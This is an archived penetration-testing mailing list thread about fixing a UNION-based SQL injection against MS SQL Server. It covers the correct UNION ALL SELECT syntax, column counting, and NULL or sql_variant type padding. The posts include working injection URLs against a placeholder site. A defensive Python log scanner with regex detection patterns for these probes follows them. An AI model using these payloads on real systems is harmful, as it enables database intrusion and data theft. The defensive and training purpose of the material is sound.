Penetration Testing mailing list archives

Re: SQL Injection: Issue with UNION SELECT ALL


From: Francois Larouche <francois.larouche-ml () sqlpowerinjector com>
Date: Thu, 10 Jan 2008 14:16:38 -0800

I wouldn't agree with your statement Zed.

What he found was where the first conversion clash occurred. It seems that your third expression is a text field, no big deal. For some reason SQL Server gives a higher priority to the "text is incompatible with int" error, or any casting problem, than to the equal number of expressions in a UNION clause. Believe me, I learned that at my expense...

The actual number is 16 if I counted well with his HAVING test.

Your problem now Joseph is just to make sure that you can have the right format. If you use NULL it will work each time, however you won't get anything back...

The error you have is that you used SELECT ALL; in fact you need to use UNION ALL SELECT ... the ALL goes between UNION and SELECT.

Good luck

Francois

Zed Qyves wrote:
Hello,

you seem to have successfully enumerated the number of fields of the
first query at
----------------------------------------------------------------------------------
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL 1,2,3--
       Returns:
       Operand type clash: text is incompatible with int

       Reference Found:
       http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html
--------------------------------------------------------------------------------

you can use the convert and sql_variant data type of MS SQL SERVER to
get to the right data types as well.

so your query would look like...

-------------------------------------------------------------------------------
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL convert(sql_variant,1),convert(sql_variant,2),convert(sql_variant,3)--

Reference:
       http://www.sqlsecurity.com/LinkClick.aspx?link=SQL+Server+Security.ppt&tabid=60&mid=398

-------------------------------------------------------------------------------

Have fun,
ZQ
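
For defenders reviewing web logs, the probing steps discussed in this thread (HAVING test, UNION column matching, NULL or sql_variant padding) all show up as non-integer content in a parameter that should only hold a number. The following is an added example, not part of the original posts; the log format, the stage names, the `classify` and `scan` helpers and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markers for the probing steps discussed in the thread (stage names are assumed).
STAGES = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("having-test", re.compile(r"\bhaving\b", re.I)),
    ("type-padding", re.compile(r"\bconvert\s*\(\s*sql_variant\b|\bnull\s*,", re.I)),
    ("comment-tail", re.compile(r"--\s*$")),
]

def classify(url, int_params=("vulnparam",)):
    """Return [(param, [stage, ...])] for watched integer parameters carrying SQL."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name not in int_params or re.fullmatch(r"\d{1,10}", value):
            continue  # not a watched parameter, or a well-formed integer
        hits = [stage for stage, rx in STAGES if rx.search(value)]
        # Anything else in an integer-only parameter is still worth a look.
        findings.append((name, hits or ["non-integer"]))
    return findings

def scan(log_lines):
    """Return (client, param, stages) for every suspicious request line."""
    out = []
    for line in log_lines:
        client, _method, url = line.split(" ", 2)
        for param, stages in classify(url):
            out.append((client, param, stages))
    return out

# Constructed sample lines in a hypothetical "<client> <method> <url>" format.
SAMPLE_LOG = [
    "192.0.2.10 GET /vulnpage.asp?vulnparam=12345",
    "192.0.2.66 GET /vulnpage.asp?vulnparam=12345%20HAVING%201=1--",
    "192.0.2.66 GET /vulnpage.asp?vulnparam=12345%20UNION%20SELECT%20ALL%201,2,3--",
    "192.0.2.66 GET /vulnpage.asp?vulnparam=12345+UNION+ALL+SELECT+NULL,NULL,NULL--",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer check, applied server-side before the value reaches the query (together with a parameterized statement), removes the injection point rather than only detecting its use.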


